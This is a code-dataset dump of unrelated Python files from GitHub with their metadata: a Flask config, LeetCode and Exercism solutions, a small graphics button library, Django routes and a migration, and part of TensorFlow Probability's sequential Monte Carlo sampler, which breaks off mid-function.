7aa4bba2c4b8fdf4ef4913eb41b7114c6a87829a | 49dd2e801ae161b97abc2e7704debf1b19ef5f5d | /config.py | 9ad5353015e986a27c9e8308ff1fbbbcc0b6cdba | [] | no_license | Ggzzhh/Learn_Flask | 7b207a45454e71def3bf332c4ee381a03c5f2082 | 3cd52b674e11fcfd883266e504fb11134ae23337 | refs/heads/master | 2021-01-20T09:23:39.089481 | 2017-09-21T01:52:52 | 2017-09-21T01:52:52 | 101,593,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,048 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
import os
basedir = os.path.abspath(os.path.dirname(__file__))
# 基础设置
class Config:
# 设置密匙
SECRET_KEY = os.environ.get('SECRET_KEY') or 'GG0914ZH'
# 每次请求结束后自动提交数据库变动设置为true
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
# Flask-SQLAlchemy 将会追踪对象的修改并且发送信号
SQLALCHEMY_TRACK_MODIFICATIONS = True
# 邮箱主题前缀
FLASKY_MAIL_SUBJECT_PREFIX = '[Flasky-test]'
# 寄件人
FLASKY_MAIL_SENDER = '某管理员 <[email protected]>'
# 文章分页显示数
FLASKY_POSTS_PER_PAGE = 10
# 粉丝页分页显示数
FLASK_FOLLOWERS_PER_PAGE = 15
# 评论分页显示数
FLASKY_COMMENTS_PER_PAGE = 15
# 管理员邮箱
FLASKY_ADMIN = os.environ.get('FLASKY_ADMIN')
# 查询速度慢于多少秒
FLASKY_SLOW_DB_QUERY_TIME = 0.5
# SQLAlchemy记录查询
SQLALCHEMY_RECORD_QUERIES = True
# SSL协议开关
SSL_DISABLE = True
MAIL_SERVER = 'smtp.139.com' # 服务器地址
MAIL_PORT = 465 # 服务器端口号
MAIL_USE_TLS = False # 默认为False
MAIL_USE_SSL = True # 打开邮箱SSL安全协议
MAIL_USERNAME = os.environ.get('MAIL_USERNAME') # 在环境变量中获取账号
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD') # 在环境变量中获取密码
@staticmethod
def init_app(app):
pass
# 开发配置
class DevelopmentConfig(Config):
DEBUG = True # 调试开关
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
# 测试设置
class TestingConfig(Config):
TESTING = True # 测试开关
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
@classmethod
def init_app(cls, app):
Config.init_app(app)
# 发送错误到管理员邮箱
import logging
from logging.handlers import SMTPHandler
credentials = None
secure = None
if getattr(cls, 'MAIL_USERNAME', None) is not None:
credentials = (cls.MAIL_USERNAME, cls.MAIL_PASSWORD)
if getattr(cls, 'MAIL_USE_TLS', None):
secure = ()
mail_handler = SMTPHandler(
mailhost=(cls.MAIL_SERVER, cls.MAIL_PORT),
fromaddr=cls.FLASKY_MAIL_SENDER,
toaddrs=[cls.FLASKY_ADMIN],
subject=cls.FLASKY_MAIL_SUBJECT_PREFIX + ' Application Error',
credentials=credentials,
secure=secure)
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
} | [
"[email protected]"
] | |
aca38c5c4660e95c314a00a95abe93394e298433 | 0ba1743e9f865a023f72a14d3a5c16b99ee7f138 | /problems/test_0037_bit_field.py | 24161f2a4e3a6e98aa27f1d11d43512d52de7cfa | [
"Unlicense"
] | permissive | chrisxue815/leetcode_python | d0a38a4168243b0628256825581a6df1b673855c | a33eb7b833f6998972e5340d383443f3a2ee64e3 | refs/heads/main | 2022-06-20T15:09:27.221807 | 2022-06-02T21:55:35 | 2022-06-02T21:55:35 | 94,590,264 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | import unittest
class Solution:
def solveSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: void Do not return anything, modify board in-place instead.
"""
rows = [-1] * 9
cols = [-1] * 9
blocks = [-1] * 9
for rownum, row in enumerate(board):
for colnum, num in enumerate(row):
if num != '.':
num = int(num)
mask = ~(1 << num)
rows[rownum] &= mask
cols[colnum] &= mask
blocks[rownum // 3 * 3 + colnum // 3] &= mask
def dfs(rownum, colnum):
while True:
if colnum < 8:
colnum += 1
elif rownum < 8:
colnum = 0
rownum += 1
else:
return True
if board[rownum][colnum] == '.':
break
blocknum = rownum // 3 * 3 + colnum // 3
for num in range(1, 10):
mask = 1 << num
if rows[rownum] & mask and cols[colnum] & mask and blocks[blocknum] & mask:
rows[rownum] &= ~mask
cols[colnum] &= ~mask
blocks[blocknum] &= ~mask
if dfs(rownum, colnum):
board[rownum][colnum] = str(num)
return True
rows[rownum] |= mask
cols[colnum] |= mask
blocks[blocknum] |= mask
return False
dfs(0, -1)
class Test(unittest.TestCase):
def test(self):
self._test([
[5, 3, 0, 0, 7, 0, 0, 0, 0],
[6, 0, 0, 1, 9, 5, 0, 0, 0],
[0, 9, 8, 0, 0, 0, 0, 6, 0],
[8, 0, 0, 0, 6, 0, 0, 0, 3],
[4, 0, 0, 8, 0, 3, 0, 0, 1],
[7, 0, 0, 0, 2, 0, 0, 0, 6],
[0, 6, 0, 0, 0, 0, 2, 8, 0],
[0, 0, 0, 4, 1, 9, 0, 0, 5],
[0, 0, 0, 0, 8, 0, 0, 7, 9],
], [
[5, 3, 4, 6, 7, 8, 9, 1, 2],
[6, 7, 2, 1, 9, 5, 3, 4, 8],
[1, 9, 8, 3, 4, 2, 5, 6, 7],
[8, 5, 9, 7, 6, 1, 4, 2, 3],
[4, 2, 6, 8, 5, 3, 7, 9, 1],
[7, 1, 3, 9, 2, 4, 8, 5, 6],
[9, 6, 1, 5, 3, 7, 2, 8, 4],
[2, 8, 7, 4, 1, 9, 6, 3, 5],
[3, 4, 5, 2, 8, 6, 1, 7, 9],
])
def _test(self, board, expected):
board = [[str(num) if num != 0 else '.' for num in row] for row in board]
Solution().solveSudoku(board)
board = [[int(num) for num in row] for row in board]
self.assertEqual(expected, board)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
b095020e31a76e851a1c922f39050300a38635b1 | 942f0b081d2271978ffe20fbbfa8d687b57e5c02 | /leetcode-june-challenge/largest_divisible_subset.py | 78df0caffe4029792b53277570585a87054ba1a7 | [] | no_license | simtb/coding-puzzles | 99762322606bb505d82924d4d5843db1c04aafbd | 9e1d53e35b2117240eb357d7930cdb8cfd891c8e | refs/heads/master | 2021-04-12T15:46:40.181048 | 2021-02-28T23:47:36 | 2021-02-28T23:47:36 | 249,089,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | """
Given a set of distinct positive integers, find the largest subset such that every pair (Si, Sj) of elements in this subset satisfies:
Si % Sj = 0 or Sj % Si = 0.
If there are multiple solutions, return any subset is fine.
"""
class Solution:
def largestDivisibleSubset(self, nums) -> List[int]:
if not nums:
return []
nums.sort()
ans: List[List[int]] = [[num] for num in nums]
for i in range(len(nums)):
for j in range(i):
if nums[i] % nums[j] == 0 and len(ans[i]) < len(ans[j]) + 1:
ans[i] = ans[j] + [nums[i]]
return max(ans, key=len)
| [
"[email protected]"
] | |
8e81d9fa2913d6a02e05fbb400cf98948cbc3c60 | 6e68584f2819351abe628b659c01184f51fec976 | /Centre_College/CSC_117/CSC_117_Python_Files/custom_library.py | b0fe3dea23a2323e7f981eba4de241d6c2dc5a3d | [] | no_license | DanSGraham/code | 0a16a2bfe51cebb62819cd510c7717ae24b12d1b | fc54b6d50360ae12f207385b5d25adf72bfa8121 | refs/heads/master | 2020-03-29T21:09:18.974467 | 2017-06-14T04:04:48 | 2017-06-14T04:04:48 | 36,774,542 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,531 | py | ###
### A custom library to make CSC 117 labs quicker
###By Daniel Graham
##
from graphics import *
#These save the buttons for use later
button_list = []
points_list = []
button_text_list = []
def button(win_name, button_name, x1,y1,x2,y2,buttontext, button_outline = None, button_fill=None, text_color=None, text_size = 12, text_style = 'normal', default = None):
"""Given 12 inputs window name, button name, points,
text to input, and other options, this function draws a button and saves its points/name to lists for checking
in button_checker. Order of input is:
win_name, button name, position, text, outline, fill, text color, text size, text style"""
#these lines establish the buttons_list and points_list as global variables
global button_list
global points_list
global button_text_list
#If the points are not given in the correct order this code rearranges them.
if x1 > x2:
x1,x2 = x2,x1
if y1 > y2:
y1, y2 = y2, y1
#This code draws the button
button_name = Rectangle(Point(x1, y1), Point(x2, y2))
button_text = Text(Point((x1 + (x2-x1)/2), (y1+ (y2-y1)/2)), str(buttontext))
button_name.draw(win_name)
button_text.draw(win_name)
#The next parts allow for colors!!!
if button_outline != default or button_outline != '':
button_name.setOutline(button_outline)
if button_fill != default or button_fill != '':
button_name.setFill(button_fill)
if text_color != default or text_color != '':
button_text.setTextColor(text_color)
if text_size != default or text_size != '':
button_text.setSize(text_size)
if text_style != default or text_style != '':
button_text.setStyle(text_style)
#These lines store the button name and points for use later in the checker
button_list.append(button_name)
button_text_list.append(button_text)
points_list.append(x1)
points_list.append(y1)
points_list.append(x2)
points_list.append(y2)
return button_name
def button_check(win_name):
"""This function takes button points and a window name and checks which button was clicked. Must have the lists named button_list and points_list"""
#establishes global variables
global button_list
global points_list
while True:
clicked_point = win_name.getMouse()
clicked_x = clicked_point.getX()
clicked_y = clicked_point.getY()
for i in range(len(button_list)):
if clicked_x > points_list[i*4] and clicked_x < points_list[(2)+(4*i)] and clicked_y > points_list[1+4*i] and clicked_y < points_list[3 + 4*i]:
return button_list[i]
def button_undraw(to_undraw):
"""This function undraws a list of buttons or single button from the window"""
global button_text_list
global button_list
if type(to_undraw) == list :
for button in to_undraw:
button.undraw()
index_of_text_undraw = to_undraw.index(button)
button_text_list[index_of_text_undraw].undraw()
elif type(to_undraw) != list :
button = to_undraw
button.undraw()
index_of_text_undraw = button_list.index(button)
button_text_list[index_of_text_undraw].undraw()
button_list.remove(button)
button_text_list.remove(button_text_list[index_of_text_undraw])
def test():
window = GraphWin('Test Window')
close_button = 0 #initialize the button variable
close_button = button(window, close_button, 1,1,150,150, "close")#Set each button variable equal to the button it refers to
no_close_button = 0
no_close_button = button(window, no_close_button, 160,160,180,180, "No close")
if button_check(window) == close_button: #check which button variable is called
print "Close!"
elif button_check(window) == no_close_button:
print "No close"
#close_button.undraw() The issue with this approach is the text does not get undrawn.
button_undraw(close_button)#undraw desired buttons
window.getMouse()
button_undraw(button_list)
window.getMouse
window.close()
#Running into errors still
#For some reason the remaining list is not undrawing and the no close button has to be clicked twice to return its value
if __name__ == '__main__':
test()
| [
"[email protected]"
] | |
6c84cb245a34a99d80a0b5e9643a2cc14e435e3e | f4fa497cbd99e24e242a133e002c8142051a6902 | /words/urls.py | 796ee61ba06c25dd5414fda69636f201e9dbaf5d | [] | no_license | austinbrovick/django-economics | 3b8e79a21e2a17a52e57b2a0731f4e797ee1b8c2 | 9ce51bd7e134e84409c48ae541e01456d48af2cb | refs/heads/master | 2021-01-17T12:37:47.587407 | 2016-06-20T03:44:05 | 2016-06-20T03:44:05 | 58,336,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | from django.conf.urls import url
from .views import word_list, WordCreate, word_detail, DefinitionCreate, DefinitionDownVote, DefinitionUpVote, words_micro, words_macro, words_both
urlpatterns = [
url(r'^$', word_list, name='words_list'),
url(r'^create/$', WordCreate.as_view(), name='words_word_create'),
url(r'^(?P<pk>\d+)/$', word_detail, name='words_word_detail'),
url(r'^create/(?P<pk>\d+)/$', DefinitionCreate.as_view(), name='words_definition_create'),
url(r'^upvote/(?P<pk>\d+)/$', DefinitionUpVote.as_view(), name='words_definition_upvote'),
url(r'^downvote/(?P<pk>\d+)/$', DefinitionDownVote.as_view(), name='words_definition_downvote'),
url(r'^microeconomics/$', words_micro, name='words_micro'),
url(r'^macroeconomics/$', words_macro, name='words_macro'),
url(r'^micro_and_macro/$', words_both, name='words_both'),
]
| [
"[email protected]"
] | |
924d29ab36ead397539c2dbdea111bceb73f20aa | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/edbcf1a652c246b7a144d8311374fbc3.py | e715104cfa6369084ca1fb912c106baa188e1191 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 240 | py | def hey(message):
message = message.strip()
if not message:
return 'Fine. Be that way!'
if message.isupper():
return 'Woah, chill out!'
if message.endswith('?'):
return 'Sure.'
return 'Whatever.'
| [
"[email protected]"
] | |
cb69a7b7282f4fb2539a466dee032cf0532748eb | 78d5a6e0846cb6b03544e4f717651ca59dfc620c | /treasury-admin/interface/migrations/0005_auto_20171026_1641.py | 47e6661136111d9a0fd9cdbb9048864ba031a0c8 | [] | no_license | bsca-bank/treasury-admin | 8952788a9a6e25a1c59aae0a35bbee357d94e685 | 5167d6c4517028856701066dd5ed6ac9534a9151 | refs/heads/master | 2023-02-05T12:45:52.945279 | 2020-12-13T08:07:41 | 2020-12-13T08:07:41 | 320,323,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-26 15:41
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('interface', '0004_auto_20171026_0918'),
]
operations = [
migrations.RemoveField(
model_name='apbkcom',
name='date_cr',
),
migrations.RemoveField(
model_name='apbkcom',
name='date_dr',
),
]
| [
"[email protected]"
] | |
2abc469fd8fa1c35134df85ffb8634a4f1989de0 | 3be42b83a15d022f5863c96ec26e21bac0f7c27e | /tensorflow_probability/python/experimental/mcmc/sample_sequential_monte_carlo.py | abda0f56e671f79f146e53b03248b99b99d40d8e | [
"Apache-2.0"
] | permissive | ogrisel/probability | 846f5c13cddee5cf167b215e651b7479003f15d2 | 8f67456798615f9bf60ced2ce6db5d3dba3515fe | refs/heads/master | 2022-11-09T10:53:23.000918 | 2020-07-01T23:16:03 | 2020-07-01T23:17:25 | 276,580,359 | 2 | 1 | Apache-2.0 | 2020-07-02T07:37:58 | 2020-07-02T07:37:57 | null | UTF-8 | Python | false | false | 24,262 | py | # Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Experimental MCMC driver, `sample_sequential_monte_carlo`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.experimental.mcmc import weighted_resampling
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.math.generic import log1mexp
from tensorflow_probability.python.math.generic import log_add_exp
from tensorflow_probability.python.math.generic import reduce_logmeanexp
from tensorflow_probability.python.mcmc import hmc
from tensorflow_probability.python.mcmc import random_walk_metropolis
from tensorflow_probability.python.mcmc import transformed_kernel
from tensorflow_probability.python.mcmc.internal import util as mcmc_util
from tensorflow_probability.python.util.seed_stream import SeedStream
__all__ = [
'default_make_hmc_kernel_fn',
'gen_make_hmc_kernel_fn',
'gen_make_transform_hmc_kernel_fn',
'make_rwmh_kernel_fn',
'sample_sequential_monte_carlo',
'simple_heuristic_tuning',
]
PRINT_DEBUG = False
ParticleInfo = collections.namedtuple(
'ParticleInfo',
[
'log_accept_prob', # log acceptance probability per particle
'log_scalings',
'tempered_log_prob',
'likelihood_log_prob',
])
SMCResults = collections.namedtuple(
'SMCResults',
[
'num_steps',
'inverse_temperature',
'log_marginal_likelihood',
'particle_info', # A namedtuple of ParticleInfo
])
def gather_mh_like_result(results):
"""Gather log_accept_ratio and target_log_prob from kernel result."""
# For MH kernel result.
if (hasattr(results, 'proposed_results')
and hasattr(results, 'accepted_results')):
return results.log_accept_ratio, results.accepted_results.target_log_prob
# For NUTS kernel result.
if (hasattr(results, 'log_accept_ratio')
and hasattr(results, 'target_log_prob')):
return results.log_accept_ratio, results.target_log_prob
# For TransformTransitionKernel Result.
if hasattr(results, 'inner_results'):
return gather_mh_like_result(results.inner_results)
raise TypeError('Cannot find MH results.')
def default_make_tempered_target_log_prob_fn(
prior_log_prob_fn, likelihood_log_prob_fn, inverse_temperatures):
"""Helper which creates inner kernel target_log_prob_fn."""
def _tempered_target_log_prob(*args):
priorlogprob = tf.identity(prior_log_prob_fn(*args),
name='prior_log_prob')
loglike = tf.identity(likelihood_log_prob_fn(*args),
name='likelihood_log_prob')
return tf.identity(priorlogprob + loglike * inverse_temperatures,
name='tempered_logp')
return _tempered_target_log_prob
def make_rwmh_kernel_fn(target_log_prob_fn, init_state, scalings, seed=None):
"""Generate a Random Walk MH kernel."""
with tf.name_scope('make_rwmh_kernel_fn'):
seed = SeedStream(seed, salt='make_rwmh_kernel_fn')
state_std = [
tf.math.reduce_std(x, axis=0, keepdims=True)
for x in init_state
]
step_size = [
s * ps.cast( # pylint: disable=g-complex-comprehension
mcmc_util.left_justified_expand_dims_like(scalings, s),
s.dtype) for s in state_std
]
return random_walk_metropolis.RandomWalkMetropolis(
target_log_prob_fn,
new_state_fn=random_walk_metropolis.random_walk_normal_fn(
scale=step_size),
seed=seed)
def compute_hmc_step_size(scalings, state_std, num_leapfrog_steps):
return [
s / ps.cast(num_leapfrog_steps, s.dtype) * ps.cast( # pylint: disable=g-complex-comprehension
mcmc_util.left_justified_expand_dims_like(scalings, s),
s.dtype) for s in state_std
]
def gen_make_transform_hmc_kernel_fn(unconstraining_bijectors,
num_leapfrog_steps=10):
"""Generate a transformed hmc kernel."""
def make_transform_hmc_kernel_fn(
target_log_prob_fn,
init_state,
scalings,
seed=None):
"""Generate a transform hmc kernel."""
with tf.name_scope('make_transformed_hmc_kernel_fn'):
seed = SeedStream(seed, salt='make_transformed_hmc_kernel_fn')
# TransformedTransitionKernel doesn't modify the input step size, thus we
# need to pass the appropriate step size that are already in unconstrained
# space
state_std = [
tf.math.reduce_std(bij.inverse(x), axis=0, keepdims=True)
for x, bij in zip(init_state, unconstraining_bijectors)
]
step_size = compute_hmc_step_size(scalings, state_std, num_leapfrog_steps)
return transformed_kernel.TransformedTransitionKernel(
hmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn,
num_leapfrog_steps=num_leapfrog_steps,
step_size=step_size,
seed=seed),
unconstraining_bijectors)
return make_transform_hmc_kernel_fn
def gen_make_hmc_kernel_fn(num_leapfrog_steps=10):
"""Generate a transformed hmc kernel."""
def make_hmc_kernel_fn(
target_log_prob_fn,
init_state,
scalings,
seed=None):
"""Generate a hmc without transformation kernel."""
with tf.name_scope('make_hmc_kernel_fn'):
seed = SeedStream(seed, salt='make_hmc_kernel_fn')
state_std = [
tf.math.reduce_std(x, axis=0, keepdims=True)
for x in init_state
]
step_size = compute_hmc_step_size(scalings, state_std, num_leapfrog_steps)
return hmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn,
num_leapfrog_steps=num_leapfrog_steps,
step_size=step_size,
seed=seed)
return make_hmc_kernel_fn
# Generate a default `make_hmc_kernel_fn`
default_make_hmc_kernel_fn = gen_make_hmc_kernel_fn()
def simple_heuristic_tuning(num_steps,
log_scalings,
log_accept_prob,
optimal_accept=0.234,
target_accept_prob=0.99,
name=None):
"""Tune the number of steps and scaling of one mutation.
# TODO(b/152412213): Better explanation of the heuristic used here.
This is a simple heuristic for tuning the number of steps of the next
mutation, as well as the scaling of a transition kernel (e.g., step size in
HMC, scale of a Normal proposal in RWMH) using the acceptance probability from
the previous mutation stage in SMC.
Args:
num_steps: The initial number of steps for the next mutation, to be tune.
log_scalings: The log of the scale of the proposal kernel
log_accept_prob: The log of the acceptance ratio from the last mutation.
optimal_accept: Optimal acceptance ratio for a Transitional Kernel. Default
value is 0.234 (Optimal for Random Walk Metropolis kernel).
target_accept_prob: Target acceptance probability at the end of one mutation
step. Default value: 0.99
name: Python `str` name prefixed to Ops created by this function.
Default value: `None`.
Returns:
num_steps: The number of steps for the next mutation.
new_log_scalings: The log of the scale of the proposal kernel for the next
mutation.
"""
with tf.name_scope(name or 'simple_heuristic_tuning'):
optimal_accept = tf.constant(optimal_accept, dtype=log_accept_prob.dtype)
target_accept_prob = tf.constant(
target_accept_prob, dtype=log_accept_prob.dtype)
log_half_constant = tf.constant(np.log(.5), dtype=log_scalings.dtype)
avg_log_scalings = reduce_logmeanexp(log_scalings, axis=0)
avg_log_accept_prob = reduce_logmeanexp(
log_accept_prob, axis=0)
avg_log_scaling_target = avg_log_scalings + (
tf.exp(avg_log_accept_prob) - optimal_accept)
new_log_scalings = log_half_constant + log_add_exp(
avg_log_scaling_target,
log_scalings + (tf.exp(log_accept_prob) - optimal_accept)
)
num_particles = ps.shape(log_accept_prob)[-1]
num_proposed = tf.cast(
num_particles * num_steps, dtype=avg_log_accept_prob.dtype)
# max(1/num_proposed, average_accept_ratio)
log_avg_accept = tf.math.maximum(-tf.math.log(num_proposed),
avg_log_accept_prob)
num_steps = tf.cast(
tf.math.log1p(-target_accept_prob) / log1mexp(log_avg_accept),
dtype=num_steps.dtype)
# We choose the number of steps from the batch that takes the longest,
# hence this is a reduce over all axes.
max_step_across_batch = tf.reduce_max(num_steps)
return max_step_across_batch, new_log_scalings
# TODO(b/152412213) Experitment to improve recommendation on static parmaeters
def sample_sequential_monte_carlo(
prior_log_prob_fn,
likelihood_log_prob_fn,
current_state,
min_num_steps=2,
max_num_steps=25,
max_stage=100,
make_kernel_fn=make_rwmh_kernel_fn,
tuning_fn=simple_heuristic_tuning,
make_tempered_target_log_prob_fn=default_make_tempered_target_log_prob_fn,
resample_fn=weighted_resampling.resample_systematic,
ess_threshold_ratio=0.5,
parallel_iterations=10,
seed=None,
name=None):
"""Runs Sequential Monte Carlo to sample from the posterior distribution.
This function uses an MCMC transition operator (e.g., Hamiltonian Monte Carlo)
to sample from a series of distributions that slowly interpolates between
an initial 'prior' distribution:
`exp(prior_log_prob_fn(x))`
and the target 'posterior' distribution:
`exp(prior_log_prob_fn(x) + target_log_prob_fn(x))`,
by mutating a collection of MC samples (i.e., particles). The approach is also
known as Particle Filter in some literature. The current implemenetation is
largely based on Del Moral et al [1], which adapts the tempering sequence
adaptively (base on the effective sample size) and the scaling of the mutation
kernel (base on the sample covariance of the particles) at each stage.
Args:
prior_log_prob_fn: Python callable that returns the log density of the
prior distribution.
likelihood_log_prob_fn: Python callable which takes an argument like
`current_state` (or `*current_state` if it's a list) and returns its
(possibly unnormalized) log-density under the likelihood distribution.
current_state: Nested structure of `Tensor`s, each of shape
`concat([[num_particles, b1, ..., bN], latent_part_event_shape])`, where
`b1, ..., bN` are optional batch dimensions. Each batch represents an
independent SMC run.
min_num_steps: The minimal number of kernel transition steps in one mutation
of the MC samples.
max_num_steps: The maximum number of kernel transition steps in one mutation
of the MC samples. Note that the actual number of steps in one mutation is
tuned during sampling and likely lower than the max_num_step.
max_stage: Integer number of the stage for increasing the temperature
from 0 to 1.
make_kernel_fn: Python `callable` which returns a `TransitionKernel`-like
object. Must take one argument representing the `TransitionKernel`'s
`target_log_prob_fn`. The `target_log_prob_fn` argument represents the
`TransitionKernel`'s target log distribution. Note:
`sample_sequential_monte_carlo` creates a new `target_log_prob_fn`
which is an interpolation between the supplied `target_log_prob_fn` and
`proposal_log_prob_fn`; it is this interpolated function which is used as
an argument to `make_kernel_fn`.
tuning_fn: Python `callable` which takes the number of steps, the log
scaling, and the log acceptance ratio from the last mutation and output
the number of steps and log scaling for the next mutation.
make_tempered_target_log_prob_fn: Python `callable` that takes the
`prior_log_prob_fn`, `likelihood_log_prob_fn`, and `inverse_temperatures`
and creates a `target_log_prob_fn` `callable` that pass to
`make_kernel_fn`.
resample_fn: Python `callable` to generate the indices of resampled
particles, given their weights. Generally, one of
`tfp.experimental.mcmc.resample_independent` or
`tfp.experimental.mcmc.resample_systematic`, or any function
with the same signature.
Default value: `tfp.experimental.mcmc.resample_systematic`.
ess_threshold_ratio: Target ratio for effective sample size.
parallel_iterations: The number of iterations allowed to run in parallel.
It must be a positive integer. See `tf.while_loop` for more details.
seed: Python integer or TFP seedstream to seed the random number generator.
name: Python `str` name prefixed to Ops created by this function.
Default value: `None` (i.e., 'sample_sequential_monte_carlo').
Returns:
n_stage: Number of the mutation stage SMC ran.
final_state: `Tensor` or Python `list` of `Tensor`s representing the
final state(s) of the Markov chain(s). The output are the posterior
samples.
final_kernel_results: `collections.namedtuple` of internal calculations used
to advance the chain.
#### References
[1] Del Moral, Pierre, Arnaud Doucet, and Ajay Jasra. An adaptive sequential
Monte Carlo method for approximate Bayesian computation.
_Statistics and Computing_, 22.5(1009-1020), 2012.
"""
with tf.name_scope(name or 'sample_sequential_monte_carlo'):
seed_stream = SeedStream(seed, salt='smc_seed')
unwrap_state_list = not tf.nest.is_nested(current_state)
if unwrap_state_list:
current_state = [current_state]
current_state = [
tf.convert_to_tensor(s, dtype_hint=tf.float32) for s in current_state
]
# Initial preprocessing at Stage 0
likelihood_log_prob = likelihood_log_prob_fn(*current_state)
likelihood_rank = ps.rank(likelihood_log_prob)
dimension = ps.reduce_sum([
ps.reduce_prod(ps.shape(x)[likelihood_rank:]) for x in current_state])
# We infer the particle shapes from the resulting likelihood:
# [num_particles, b1, ..., bN]
particle_shape = ps.shape(likelihood_log_prob)
num_particles, batch_shape = particle_shape[0], particle_shape[1:]
effective_sample_size_threshold = tf.cast(
num_particles * ess_threshold_ratio, tf.int32)
# TODO(b/152412213): Revisit this default parameter.
# Default to the optimal scaling of a random walk kernel for a d-dimensional
# normal distributed targets: 2.38 ** 2 / d.
# For more detail see:
# Roberts GO, Gelman A, Gilks WR. Weak convergence and optimal scaling of
# random walk Metropolis algorithms. _The annals of applied probability_.
# 1997;7(1):110-20.
scale_start = (
tf.constant(2.38 ** 2, dtype=likelihood_log_prob.dtype) /
tf.constant(dimension, dtype=likelihood_log_prob.dtype))
inverse_temperature = tf.zeros(batch_shape, dtype=likelihood_log_prob.dtype)
scalings = ps.ones_like(likelihood_log_prob) * ps.minimum(scale_start, 1.)
kernel = make_kernel_fn(
make_tempered_target_log_prob_fn(
prior_log_prob_fn,
likelihood_log_prob_fn,
inverse_temperature),
current_state,
scalings,
seed=seed_stream)
pkr = kernel.bootstrap_results(current_state)
_, kernel_target_log_prob = gather_mh_like_result(pkr)
particle_info = ParticleInfo(
log_accept_prob=ps.zeros_like(likelihood_log_prob),
log_scalings=tf.math.log(scalings),
tempered_log_prob=kernel_target_log_prob,
likelihood_log_prob=likelihood_log_prob,
)
current_pkr = SMCResults(
num_steps=tf.convert_to_tensor(
max_num_steps, dtype=tf.int32, name='num_steps'),
inverse_temperature=inverse_temperature,
log_marginal_likelihood=tf.zeros_like(inverse_temperature),
particle_info=particle_info
)
def update_weights_temperature(inverse_temperature, likelihood_log_prob):
"""Calculate the next inverse temperature and update weights."""
likelihood_diff = likelihood_log_prob - tf.reduce_max(
likelihood_log_prob, axis=0)
def _body_fn(new_beta, upper_beta, lower_beta, eff_size, log_weights):
"""One iteration of the temperature and weight update."""
new_beta = (lower_beta + upper_beta) / 2.0
log_weights = (new_beta - inverse_temperature) * likelihood_diff
log_weights_norm = tf.math.log_softmax(log_weights, axis=0)
eff_size = tf.cast(
tf.exp(-tf.math.reduce_logsumexp(2 * log_weights_norm, axis=0)),
tf.int32)
upper_beta = tf.where(
eff_size < effective_sample_size_threshold,
new_beta, upper_beta)
lower_beta = tf.where(
eff_size < effective_sample_size_threshold,
lower_beta, new_beta)
return new_beta, upper_beta, lower_beta, eff_size, log_weights
def _cond_fn(new_beta, upper_beta, lower_beta, eff_size, *_): # pylint: disable=unused-argument
# TODO(junpenglao): revisit threshold below to be dtype specific.
threshold = 1e-6
return (
tf.math.reduce_any(upper_beta - lower_beta > threshold) &
tf.math.reduce_any(eff_size != effective_sample_size_threshold)
)
(new_beta, upper_beta, lower_beta, eff_size, log_weights) = tf.while_loop( # pylint: disable=unused-variable
cond=_cond_fn,
body=_body_fn,
loop_vars=(
tf.zeros_like(inverse_temperature),
tf.fill(
ps.shape(inverse_temperature),
tf.constant(2, inverse_temperature.dtype)),
inverse_temperature,
tf.zeros_like(inverse_temperature, dtype=tf.int32),
tf.zeros_like(likelihood_diff)),
parallel_iterations=parallel_iterations
)
log_weights = tf.where(new_beta < 1.,
log_weights,
(1. - inverse_temperature) * likelihood_diff)
marginal_loglike_ = reduce_logmeanexp(
(new_beta - inverse_temperature) * likelihood_log_prob, axis=0)
new_inverse_temperature = tf.clip_by_value(new_beta, 0., 1.)
return marginal_loglike_, new_inverse_temperature, log_weights
def mutate(
current_state,
log_scalings,
num_steps,
inverse_temperature):
"""Mutate the state using a Transition kernel."""
with tf.name_scope('mutate_states'):
scalings = tf.exp(log_scalings)
kernel = make_kernel_fn(
make_tempered_target_log_prob_fn(
prior_log_prob_fn,
likelihood_log_prob_fn,
inverse_temperature),
current_state,
scalings,
seed=seed_stream)
